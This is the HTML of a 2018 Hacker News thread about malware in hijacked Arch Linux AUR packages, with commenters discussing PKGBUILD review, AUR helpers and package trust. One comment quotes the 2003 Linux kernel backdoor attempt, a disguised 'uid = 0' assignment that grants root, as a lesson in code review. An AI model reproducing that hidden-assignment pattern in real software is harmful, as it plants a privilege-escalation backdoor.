             | <a href="#17501939" class="clicky" aria-hidden="true">root</a> | <a href="#17502548" class="clicky" aria-hidden="true">parent</a> | <a href="#17502597" class="clicky" aria-hidden="true">prev</a> | <a href="#17506107" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503457" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I like and use auracle. It&#x27;s basically a rewrite &#x2F; redo of cower, the core of pacaur, by the same developer. Pacaur was the most popular alternative to Yaourt, but is now discontinued.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17506107'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17506107'href='vote?id=17506107&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Phelinofist" class="hnuser">Phelinofist</a> <span class="age" title="2018-07-11T11:36:36"><a href="item?id=17506107">on July 11, 2018</a></span> <span id="unv_17506107"></span>          <span class='navs'>
             | <a href="#17501939" class="clicky" aria-hidden="true">root</a> | <a href="#17502548" class="clicky" aria-hidden="true">parent</a> | <a href="#17503457" class="clicky" aria-hidden="true">prev</a> | <a href="#17501520" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17506107" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">cower from falconindy</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                        <tr class='athing comtr' id='17501520'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17501520'href='vote?id=17501520&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=tombert" class="hnuser">tombert</a> <span class="age" title="2018-07-10T19:57:16"><a href="item?id=17501520">on July 10, 2018</a></span> <span id="unv_17501520"></span>          <span class='navs'>
             | <a href="#17501939" class="clicky" aria-hidden="true">prev</a> | <a href="#17502544" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501520" n="5" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I mean, is this new information?  I always look at the upvotes on the package to see if it has been tested.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17501619'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17501619'href='vote?id=17501619&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=bretthoerner" class="hnuser">bretthoerner</a> <span class="age" title="2018-07-10T20:07:51"><a href="item?id=17501619">on July 10, 2018</a></span> <span id="unv_17501619"></span>          <span class='navs'>
             | <a href="#17501520" class="clicky" aria-hidden="true">parent</a> | <a href="#17501959" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501619" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">You should read the PKGBUILD, even on upgrades. In this case the bad guy took over an orphaned package (with 853 votes) and updated it. You could have looked at the upvotes 5 years ago and blindly upgraded to his new version last week.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17501959'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17501959'href='vote?id=17501959&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=tbrock" class="hnuser">tbrock</a> <span class="age" title="2018-07-10T20:41:58"><a href="item?id=17501959">on July 10, 2018</a></span> <span id="unv_17501959"></span>          <span class='navs'>
             | <a href="#17501520" class="clicky" aria-hidden="true">parent</a> | <a href="#17501619" class="clicky" aria-hidden="true">prev</a> | <a href="#17502526" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501959" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Yeah it would be better if the packages had all-time upvotes as well as “upvotes for this version”.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503089'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17503089'href='vote?id=17503089&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=tomswartz07" class="hnuser">tomswartz07</a> <span class="age" title="2018-07-10T23:25:28"><a href="item?id=17503089">on July 10, 2018</a></span> <span id="unv_17503089"></span>          <span class='navs'>
             | <a href="#17501520" class="clicky" aria-hidden="true">root</a> | <a href="#17501959" class="clicky" aria-hidden="true">parent</a> | <a href="#17502526" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503089" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Honestly, I don&#x27;t see this happening.<p>Many packages use rolling versions from git commits, so while the PKGBUILDs don&#x27;t get updated, any time a user re-runs makepkg on that PKGBUILD the latest commit is pulled and built.<p>In those cases, a PKGBUILD might be months or years old, but still consistently up to date and valid.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17502526'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17502526'href='vote?id=17502526&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=oralty" class="hnuser">oralty</a> <span class="age" title="2018-07-10T21:52:11"><a href="item?id=17502526">on July 10, 2018</a></span> <span id="unv_17502526"></span>          <span class='navs'>
             | <a href="#17501520" class="clicky" aria-hidden="true">parent</a> | <a href="#17501959" class="clicky" aria-hidden="true">prev</a> | <a href="#17502544" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502526" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Not a great idea. Upvotes don&#x27;t really tell you shit about testing, quality, or trust. I mean how many votes does acroread have (hint: a lot). The votes is merely to give arch some idea of how popular an AUR package is so that it can be absorbed officially.I have had a few of my AUR packages scooped up this way.  Voting may indirectly indicate that the package is useful, but it doesn&#x27;t say the thing doesn&#x27;t contain malware nor does it indicate that the script is poorly written for other reasons. I orphaned a few quite popular AUR entries with high vote counts. The counts don&#x27;t magically go away, and at that point anybody on the internet is free to adopt it.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17502544'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17502544'href='vote?id=17502544&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=arendtio" class="hnuser">arendtio</a> <span class="age" title="2018-07-10T21:54:17"><a href="item?id=17502544">on July 10, 2018</a></span> <span id="unv_17502544"></span>          <span class='navs'>
             | <a href="#17501520" class="clicky" aria-hidden="true">prev</a> | <a href="#17502704" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502544" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">As an Arch user this bothers me since a while. On the one hand the AUR contains packages I don&#x27;t want to miss, on the other hand installing and updating from the AUR is tiresome.<p>Recently I switched to the AUR helper aurman which is great, but it still doesn&#x27;t free you from reviewing PKGBUILD changes. Sometimes I wish there would be some kind of review process where popular packages could be labeled as &#x27;reviewed&#x27; (e.g. by experienced&#x2F;trusted arch users) and an (optional) option within the AUR helpers to accept &#x27;reviewed&#x27; packages without presenting the PKGBUILD for review.<p>I know that wouldn&#x27;t be perfect either, but at least it would increase the efficiency and as a user one could focus on the less popular packages where it is unlikely that someone else will find some malware.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502701'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17502701'href='vote?id=17502701&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=iv597" class="hnuser">iv597</a> <span class="age" title="2018-07-10T22:17:16"><a href="item?id=17502701">on July 10, 2018</a></span> <span id="unv_17502701"></span>          <span class='navs'>
             | <a href="#17502544" class="clicky" aria-hidden="true">parent</a> | <a href="#17502704" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502701" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">In a sense we already have that, in the form of the `community` repo: Trusted Users mark a package as safe, adopt it, and it gets packaged up and supported.<p>Perhaps the answer is a few more TUs to get some of the popular AUR packages adopted and officially supported.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17502704'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17502704'href='vote?id=17502704&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=jolmg" class="hnuser">jolmg</a> <span class="age" title="2018-07-10T22:17:59"><a href="item?id=17502704">on July 10, 2018</a></span> <span id="unv_17502704"></span>          <span class='navs'>
             | <a href="#17502544" class="clicky" aria-hidden="true">prev</a> | <a href="#17504865" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502704" n="6" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Is there a public database of linux malware found in the wild that one can study to know what kind of things to look for when reviewing PKGBUILDs and other open source code?<p>EDIT: s&#x2F;repository&#x2F;public database&#x2F;</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502713'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17502713'href='vote?id=17502713&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-10T22:19:20"><a href="item?id=17502713">on July 10, 2018</a></span> <span id="unv_17502713"></span>          <span class='navs'>
             | <a href="#17502704" class="clicky" aria-hidden="true">parent</a> | <a href="#17504865" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502713" n="5" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Nothing that I know off. Are you thinking specific to Arch Linux or in general?</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502791'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17502791'href='vote?id=17502791&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=jolmg" class="hnuser">jolmg</a> <span class="age" title="2018-07-10T22:32:22"><a href="item?id=17502791">on July 10, 2018</a></span> <span id="unv_17502791"></span>          <span class='navs'>
             | <a href="#17502704" class="clicky" aria-hidden="true">root</a> | <a href="#17502713" class="clicky" aria-hidden="true">parent</a> | <a href="#17504865" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502791" n="4" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">In general, but also containing malware found in code belonging to the different distributions, like PKGBUILDs. I&#x27;m just thinking that part of the problem with the lack of review of AUR packages by the users is that it&#x27;s not really obvious what one should be on the lookout for. What does linux malware found in the wild generally look like?, is what I&#x27;m wondering. I would think that it would benefit us all to make the cases where malware is found more easy to study.<p>The case shown here is pretty obvious looking, but I don&#x27;t think it would be too difficult to make it better hidden. Seeing what kind of tricks are statistically more common would make PKGBUILDs easier to review.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503098'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17503098'href='vote?id=17503098&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=lucb1e" class="hnuser">lucb1e</a> <span class="age" title="2018-07-10T23:27:25"><a href="item?id=17503098">on July 10, 2018</a></span> <span id="unv_17503098"></span>          <span class='navs'>
             | <a href="#17502704" class="clicky" aria-hidden="true">root</a> | <a href="#17502791" class="clicky" aria-hidden="true">parent</a> | <a href="#17504865" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503098" n="3" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">This is one example of a kernel backdoor:<p><pre><code>    if ((options == (__WCLONE|__WALL)) &amp;&amp; (current-&gt;uid = 0))
        retval = -EINVAL;
</code></pre>
If you haven&#x27;t heard of it before, and if you&#x27;re not an experienced dev, it can be tricky to spot. So what I&#x27;m trying to say is that I think you&#x27;re right in that it&#x27;s difficult for random people (even if they have a strong tech background) to do secure code reviews.<p>More info of this particular one at e.g. <a href="https:&#x2F;&#x2F;freedom-to-tinker.com&#x2F;2013&#x2F;10&#x2F;09&#x2F;the-linux-backdoor-attempt-of-2003&#x2F;" rel="nofollow">https:&#x2F;&#x2F;freedom-to-tinker.com&#x2F;2013&#x2F;10&#x2F;09&#x2F;the-linux-backdoor-...</a> or just search for &#x27;linux backdoor attempt&#x27;</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503683'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17503683'href='vote?id=17503683&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=jolmg" class="hnuser">jolmg</a> <span class="age" title="2018-07-11T01:16:02"><a href="item?id=17503683">on July 11, 2018</a></span> <span id="unv_17503683"></span>          <span class='navs'>
             | <a href="#17502704" class="clicky" aria-hidden="true">root</a> | <a href="#17503098" class="clicky" aria-hidden="true">parent</a> | <a href="#17504865" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503683" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">It&#x27;s not about everyone being prepared to find malware anywhere, though, but only in the cases where they each do. For random users of AUR packages, if they (for whatever reason) trust a project&#x27;s author, then they only need to check the package author&#x27;s work. If they could have access to historical examples of real life malware specifically on PKGBUILD files, that would make it much easier to have an idea of what kind of details they should be on the alert for.<p>For kernel devs, specifically the kind that reviews patches submitted by others, I would think it would also be useful to have data on previous successful and failed attempts at introducing backdoors into the kernel.<p>Right now, I think that for anyone that wants to see this kind of data for any particular kind of software, they&#x27;d have to search for it through various mediums like mailing lists or the blog you linked to (through google).<p>That&#x27;s an interesting link, by the way. Thanks for sharing.<p>EDIT: Removed redundant part. Misread what parent post meant.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17505445'><td><table border='0'>  <tr>    <td class='ind' indent='5'><img src="s.gif" height="1" width="200"></td><td valign="top" class="votelinks">
      <center><a id='up_17505445'href='vote?id=17505445&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=lucb1e" class="hnuser">lucb1e</a> <span class="age" title="2018-07-11T08:56:02"><a href="item?id=17505445">on July 11, 2018</a></span> <span id="unv_17505445"></span>          <span class='navs'>
             | <a href="#17502704" class="clicky" aria-hidden="true">root</a> | <a href="#17503683" class="clicky" aria-hidden="true">parent</a> | <a href="#17504865" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17505445" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">But what&#x27;s a successful backdooring attempt? Any security bug&#x2F;vuln found in the kernel could have been planted. But perhaps what&#x27;s what you meant, to have a database of such things, though I doubt it&#x27;ll make it easier. Serious attackers would either use a custom method or look at what is rarely used on the list so it doesn&#x27;t trigger any alarms.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                                          <tr class='athing comtr' id='17504865'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17504865'href='vote?id=17504865&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=etu" class="hnuser">etu</a> <span class="age" title="2018-07-11T06:32:15"><a href="item?id=17504865">on July 11, 2018</a></span> <span id="unv_17504865"></span>          <span class='navs'>
             | <a href="#17502704" class="clicky" aria-hidden="true">prev</a> | <a href="#17504385" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17504865" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I&#x27;m surprised that this hasn&#x27;t happened a lot earlier to be honest. It probably has but haven&#x27;t been picked up by someone. It&#x27;s a user submitted repo with over 44000 packages (source repology [0]).<p>It has happened to the snap store recently, but AUR has been around for ages.<p>[0]: <a href="https:&#x2F;&#x2F;repology.org&#x2F;repository&#x2F;aur" rel="nofollow">https:&#x2F;&#x2F;repology.org&#x2F;repository&#x2F;aur</a></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17504385'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17504385'href='vote?id=17504385&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=jancsika" class="hnuser">jancsika</a> <span class="age" title="2018-07-11T03:59:13"><a href="item?id=17504385">on July 11, 2018</a></span> <span id="unv_17504385"></span>          <span class='navs'>
             | <a href="#17504865" class="clicky" aria-hidden="true">prev</a> | <a href="#17503873" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17504385" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; Following the discovery all dangerous instances were removed and the user account suspended.<p>I heard they&#x27;re making a change to the policy for uploading packages to AUR. The next time this happens the user will automatically receive an email that says, &quot;Hey, don&#x27;t do that.&quot;</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17503873'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17503873'href='vote?id=17503873&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=delbel" class="hnuser">delbel</a> <span class="age" title="2018-07-11T01:59:40"><a href="item?id=17503873">on July 11, 2018</a></span> <span id="unv_17503873"></span>          <span class='navs'>
             | <a href="#17504385" class="clicky" aria-hidden="true">prev</a> | <a href="#17501469" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503873" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I tried installing Arch Linux, and it was harder then installing SunOS 4.3.  The instructions were absolutely wrong.  I wish I could give it another try, but I just don&#x27;t have time to experience the wow&#x27;s of the early 90s just to get a browser up.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17508585'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17508585'href='vote?id=17508585&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Grimm665" class="hnuser">Grimm665</a> <span class="age" title="2018-07-11T17:18:50"><a href="item?id=17508585">on July 11, 2018</a></span> <span id="unv_17508585"></span>          <span class='navs'>
             | <a href="#17503873" class="clicky" aria-hidden="true">parent</a> | <a href="#17501469" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17508585" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">The Arch wiki used to have an amazing Beginner&#x27;s guide along with the general Installation Guide. They&#x27;ve since dropped it from the wiki, but there are archived versions that I still bring up every now and then when setting up a new Arch install. Here&#x27;s one: <a href="https:&#x2F;&#x2F;csdietz.github.io&#x2F;arch-beginner-guide&#x2F;" rel="nofollow">https:&#x2F;&#x2F;csdietz.github.io&#x2F;arch-beginner-guide&#x2F;</a></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17501469'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17501469'href='vote?id=17501469&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=lerax" class="hnuser">lerax</a> <span class="age" title="2018-07-10T19:51:03"><a href="item?id=17501469">on July 10, 2018</a></span> <span id="unv_17501469"></span>          <span class='navs'>
             | <a href="#17503873" class="clicky" aria-hidden="true">prev</a> | <a href="#17502940" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501469" n="14" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Not a surprise.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17501772'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17501772'href='vote?id=17501772&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=craftyguy" class="hnuser">craftyguy</a> <span class="age" title="2018-07-10T20:22:40"><a href="item?id=17501772">on July 10, 2018</a></span> <span id="unv_17501772"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">parent</a> | <a href="#17502940" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501772" n="13" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Yes, but this may be a good reminder for fellow Arch users who have grown complacent reviewing things they install from AUR.<p>I&#x27;ve gotten to the point where I do not install any AUR helpers on my systems, and manually download PKGBUILDs and install with makepkg. These extra steps force me to 1) review the PKGBUILD + *.install files, and 2) make me reconsider whether or not I want to go through the effort for a package (i.e. &quot;do I really want this thing&quot;)<p>If you want to see all software installed from outside repos defined in &#x2F;etc&#x2F;pacman.conf, you can use this pacman option:<p><pre><code>    pacman -Qm
</code></pre>
It&#x27;s always a good idea to periodically review this list as well.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17501948'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17501948'href='vote?id=17501948&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=jolmg" class="hnuser">jolmg</a> <span class="age" title="2018-07-10T20:41:08"><a href="item?id=17501948">on July 10, 2018</a></span> <span id="unv_17501948"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">root</a> | <a href="#17501772" class="clicky" aria-hidden="true">parent</a> | <a href="#17502940" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501948" n="12" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I&#x27;ve seen the advice of not installing AUR helpers multiple times before. I guess it works for many, but I feel it takes more discipline to review the files when not using AUR helpers since you can just download them and makepkg them immediately, while all AUR helpers I&#x27;ve seen explicitly ask you if you&#x27;d like to first review the files in an editor with a default answer of [Y]es.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502270'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17502270'href='vote?id=17502270&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=cakes" class="hnuser">cakes</a> <span class="age" title="2018-07-10T21:17:55"><a href="item?id=17502270">on July 10, 2018</a></span> <span id="unv_17502270"></span>          <span class='navs'>
             | <a href="#17501469" class="clicky" aria-hidden="true">root</a> | <a href="#17501948" class="clicky" aria-hidden="true">parent</a> | <a href="#17501979" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502270" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">One of the problem I see with helpers is that a lot of them start to wrap the whole user&#x27;s package handling experience (pacman wrapping) where it seems like it would be easy to ignore the prompts and &quot;just download the package already&quot;. You can tell users the AUR is unsafe and to review PKGBUILDs but that doesn&#x27;t mean they are going to listen or do it.<p>I did write a helper, mainly for myself and a few other arch users I know, and if not for having completed it enough to use it, I wouldn&#x27;t do it again (I don&#x27;t support pacman wrapping). I use like 5-10 packages from the AUR and I either maintain them or they _never_ change and I would know something is wrong.<p>The other point to this is how is this sort of compromise best communicated? It&#x27;s important enough to hit [0] and obviously this news site, the mailinglist[1], but not the frontpage of arch itself.<p>[0] planet.archlinux.org
[1] <a href="https:&#x2F;&#x2F;lists.archlinux.org&#x2F;pipermail&#x2F;aur-general&#x2F;2018-July&#x2F;034151.html" rel="nofollow">https:&#x2F;&#x2F;lists.archlinux.org&#x2F;pipermail&#x2F;aur-general&#x2F;2018-July&#x2F;...</a></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502422'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17502422'href='vote?id=17502422&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
